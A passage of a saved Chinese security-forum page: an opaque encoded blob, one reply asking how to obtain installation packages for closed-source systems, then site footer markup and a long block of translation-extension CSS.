vXZvzuXOXR1L51Xf12b87lzUBERB+o2PllbHG0uc4hrWgZJJOAB1q9tI2GPT9iipQAZ3DbneMeU8jeM9A4Ds61WfJnaxcNVsnkbmKjaZjnhtZAb7zkdiulARERBERAXjJUQwvjZNNHG6V2zG1zgC89AzxXjdK+G122orqo/uoGF56TjgB1k4A7VHdJ203Mw6ouznTVs4c6Bjj5FOzJADR1jnPT07yEuREQEREBERAREQEREBERAXhV0sNbSS0tTGJIZWlr2ngQV7og+ftS2WWwXuahkJcwHaieR9Nh4Ht5j1grlq4OVGyiv0/+0Im5nojtbueM/SHdx7AelU+iiIiAgWVhAVuckPmtU+uu/IxVGra5IXjxZqmYJIrHE/6Gf8IK31L51Xf12b87lzV3NYW2uotSXCaqpZYop6qV8Ujm+S9peSMHgdxBxxXDQFlYRBavJBRiOz1taRh004jB58Nbn8XFWAopyZxiPQ9G4YzI6Rx/1uH6KVogiIgIi4WrdQw6ds7qp2HTvyyCPP0ndJ6hxPs4kIIhyoXiSsq6fTtAHSyFzXzNZvLnH6LMd+T2hWFbKYUVrpaRowIYWRgdjQFFNA6efBE6/XbMtxrcyNLxkxtdv7ic56huU1QEREBERAREQEReNTD8opZoNt8fhWFm2w4c3IIyDzEIPZFHtLV8pbPZblKX3C3nYc53GaM/Qfv47sZ6+1SFAREQERYJAGT7UHlVQMqqSankGWSscxw6QRj9V84lpa4tcCCCQQeII5l9FW6rZX2+CriH7uZoe3sPBfPlwYGXKqYDkNmeM9OHEIsa6IiAECLKDCtjkf8AN+t9a/saqoVr8j/m/W+tf2NQrXqOUCnbeLhaL/bo5aNk8kIexu15LXEAuac53AEkY7FoXrQlJcKP9q6PqGTwuyfk+3kH/CTvBH8J9vMohqbzqu3rs353L9WG/wBxsFX4agmIa4jbhdvY/tHT0Y39aDnzQS0074KiJ8UrDhzHtIc09BB3heas2TUGj9X0zWX2I0NWBgSHII/wvAwR1OGOpRe86YoaMGW26jttXEQSGGYCTswCQfd2ILP0D5k2z/yz+ZykKjHJxJ4TQ1vyclvhGnukdj3YUnRBERAVSyTnWnKXFE47VDTOIa08DGw5J/zEDuIHMrI1DUOpNOXGoYcOjppHNx07Jx71XnI9A112uNQR5TIWsB6nOJP5QgsqjmbLU1rG4zDOGH7Njv7ltqP01V8m1zWUMpwKyljqIjzFzSWuHbgNPcpAgIiICIiAiIgIiIINygsqLTWUGp7eP3tM7wM44B7DwDurOR2kdCldoudNeLZDX0bsxytzg8WnnaesFfu50MNyt1RQ1IzFOwsd1dB7Qd/cqpstzrtAajmttya99HI4F4aNxHASMz1DeOfGDvAQXCi8KSqgrKaOppZGywyN2mPacghe6Ao5ry8Cz6XqXtdiacGGLfvy4bz3DJ7lIuHEqrbjV+OnKJSUEB27fROJJHBzWkF7u84aO486Cw7FTGjsFvpXDDoqaNju0NGfeqBrnF1fUucckyuJPSclfRcjxHE9/HZaT7FR9u0vNdtIVF2oi59RT1DmvhG8vYGNOR1gknHOOG8bwjqBFlFYREQFbHI/5v1vrX9jVU6tjkf83631r+xqCudS+dV39dm/O5c1dLU3nVdvXZvzuXNCDKwiILf5J5xLpN8XPDUvb3ENI/FTZVlyO1X725UR5wyVo7Mg/i1WaiCIiDl6mhM+l7nE0Zc6llwOk7Jwq/5HpQ253GH6zoWPHYHEH8wVovY2WN0bwHNcCHA84VOaKldYuUUUUxwHPkpHE8+/DfaWt9qCZcojZ6D9m6hoxmS3zYkAONpjsAg9RIx/mUqt9bDcKCGtpXbUMzA9p6j09fSFi4UcNxt89FUt2op2Fjh1Ho61X
<span class=post-info>
<a class="label label-default" href=https://xz.aliyun.com/u/48040>9h0st</a>
<span class=bbs-time>2024-07-09 17:01:14</span>
<span>来自浙江 </span>
</span>
<div class="post-content markdown-body">
<p>这些闭源系统的安装包怎么拿得到呀v
</p></div>
<div class=manual-box>
<span class=thumbs data-action=post data-pk=20127 data-topic=15006><i class="fa fa-thumbs-o-up"></i><span>0</span></span>
<span class="reply-jump reply reply-count" data-nickname=9h0st>回复Ta</span>
</div>
</div>
<hr>
</li>
</ul>
</div>
</div>
<div class="row box" id=reply-box>
<div class="box-container clearfix">
<div class=reminder>
<a href="https://account.aliyun.com/login/login.htm?oauth_callback=https%3A%2F%2Fxz.aliyun.com%2Ft%2F15006&amp;from_type=xianzhi"><strong>登录</strong></a> 后跟帖
</div>
</div>
</div>
</div>
</div>
</div>
<footer class=bs-docs-footer>
<div class="container text-center">
<div class=links>
<a href=https://xz.aliyun.com/feed target=_blank>RSS</a>
<a href=https://xz.aliyun.com/about target=_blank><span>关于社区</span></a>
<a href=https://xz.aliyun.com/partner target=_blank><span>友情链接</span></a>
<a href=https://xz.aliyun.com/notice>社区小黑板</a>
<a href=https://xz.aliyun.com/connection>联系我们</a>
<a href=https://report.aliyun.com/ target=_blank>举报中心</a>
<a href=https://www.aliyun.com/complaint target=_blank>我要投诉</a>
</div>
</div>
</footer>
<div id=waf_nc_block style=display:none></div><div id=immersive-translate-popup style=all:initial><template shadowrootmode=open><style class=sf-hidden>/*!
* Pico.css v1.5.6 (https://picocss.com)
* Copyright 2019-2022 - Licensed under MIT
*/#mount{--font-family:system-ui,-apple-system,"Segoe UI","Roboto","Ubuntu","Cantarell","Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--line-height:1.5;--font-weight:400;--font-size:16px;--border-radius:.25rem;--border-width:1px;--outline-width:3px;--spacing:1rem;--typography-spacing-vertical:1.5rem;--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing);--grid-spacing-vertical:0;--grid-spacing-horizontal:var(--spacing);--form-element-spacing-vertical:.75rem;--form-element-spacing-horizontal:1rem;--nav-element-spacing-vertical:1rem;--nav-element-spacing-horizontal:.5rem;--nav-link-spacing-vertical:.5rem;--nav-link-spacing-horizontal:.5rem;--form-label-font-weight:var(--font-weight);--transition:.2s ease-in-out;--modal-overlay-backdrop-filter:blur(0.25rem)}@media(min-width:576px){#mount{--font-size:17px}}@media(min-width:768px){#mount{--font-size:18px}}@media(min-width:992px){#mount{--font-size:19px}}@media(min-width:1200px){#mount{--font-size:20px}}@media(min-width:576px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*2.5)}}@media(min-width:768px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3)}}@media(min-width:992px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3.5)}}@media(min-width:1200px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*4)}}@media(min-width:576px){article{--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media(min-width:768px){article{--block-spacing-horizontal:calc(var(--spacing)*1.5)}}@media(min-width:992px){article{--block-spacing-horizontal:calc(var(--spacing)*1.75)}}@media(min-width:1200px){article{--block-spacing-horizontal:calc(var(--spacing)*2)}}dialog>article{--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing)}@media(min-width:576px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*2.5);--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media(min-width:768px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*3);--block-spacing-horizontal:calc(var(--spacing)*1.5)}}a{--text-decoration:none}a.secondary,a.contrast{--text-decoration:underline}small{--font-size:.875em}h1,h2,h3,h4,h5,h6{--font-weight:700}h1{--font-size:2rem;--typography-spacing-vertical:3rem}h2{--font-size:1.75rem;--typography-spacing-vertical:2.625rem}h3{--font-size:1.5rem;--typography-spacing-vertical:2.25rem}h4{--font-size:1.25rem;--typography-spacing-vertical:1.874rem}h5{--font-size:1.125rem;--typography-spacing-vertical:1.6875rem}[type="checkbox"],[type="radio"]{--border-width:2px}[type="checkbox"][role="switch"]{--border-width:3px}thead th,thead td,tfoot th,tfoot td{--border-width:3px}:not(thead,tfoot)>*>td{--font-size:.875em}pre,code,kbd,samp{--font-family:"Menlo","Consolas","Roboto Mono","Ubuntu Monospace","Noto Mono","Oxygen Mono","Liberation Mono",monospace,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji"}kbd{--font-weight:bolder}[data-theme="light"],#mount:not([data-theme="dark"]){--background-color:#fff;--background-light-green:#f5f7f9;--color:hsl(205deg,20%,32%);--h1-color:hsl(205deg,30%,15%);--h2-color:#24333e;--h3-color:hsl(205deg,25%,23%);--h4-color:#374956;--h5-color:hsl(205deg,20%,32%);--h6-color:#4d606d;--muted-color:hsl(205deg,10%,50%);--muted-border-color:hsl(205deg,20%,94%);--primary:hsl(195deg,85%,41%);--primary-hover:hsl(195deg,90%,32%);--primary-focus:rgba(16,149,193,0.125);--primary-inverse:#fff;--secondary:hsl(205deg,15%,41%);--secondary-hover:hsl(205deg,20%,32%);--secondary-focus:rgba(89,107,120,0.125);--secondary-inverse:#fff;--contrast:hsl(205deg,30%,15%);--contrast-hover:#000;--contrast-focus:rgba(89,107,120,0.125);--contrast-inverse:#fff;--mark-background-color:#fff2ca;--mark-color:#543a26;--ins-color:#388e3c;--del-color:#c62828;--blockquote-border-color:var(--muted-border-color);--blockquote-footer-color:var(--muted-color);--button-box-sha
Reference in New Issue Copy Permalink